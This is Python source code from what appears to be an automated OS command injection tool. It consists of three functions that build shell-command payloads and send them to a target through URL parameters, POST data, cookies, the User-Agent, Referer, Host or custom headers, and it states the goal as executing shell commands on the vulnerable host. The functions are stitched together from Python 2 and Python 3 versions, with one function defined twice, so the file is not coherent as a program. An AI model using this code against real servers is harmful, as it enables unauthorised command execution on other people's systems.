def injection_test(payload, http_request_method, url): # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) # Encoding spaces. payload = payload.replace(" ", "%20") # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) try: # Get the response of the request response = requests.get_request_response(request) except KeyboardInterrupt: response = None # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, urllib.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) try: # Get the response of the request response = requests.get_request_response(request) except KeyboardInterrupt: response = None return response, vuln_parameter
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell( separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + _urllib.parse.quote(")}") in payload: payload = payload.replace(")%3B" + _urllib.parse.quote(")}"), ")" + _urllib.parse.quote(")}")) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: info_msg = "Executing the '" + cmd + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request( url, data.encode(settings.UNICODE_ENCODING)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = fb_payloads.cmd_execution_alter_shell( separator, cmd, OUTPUT_TEXTFILE) else: payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL != 0: payload_msg = payload.replace("\n", "\\n") if settings.COMMENT in payload_msg: payload = payload.split(settings.COMMENT)[0].strip() payload_msg = payload_msg.split(settings.COMMENT)[0].strip() debug_msg = "Executing the '" + cmd.split( settings.COMMENT)[0].strip() + "' command. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() output_payload = "\n" + settings.print_payload(payload) if settings.VERBOSITY_LEVEL != 0: output_payload = output_payload + "\n" sys.stdout.write(output_payload) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined POST data if not settings.USER_DEFINED_POST_DATA: # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url, http_request_method) payload = payload.replace(" ", "%20") target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter, http_request_method) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request( url, data.encode(settings.DEFAULT_CODEC)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response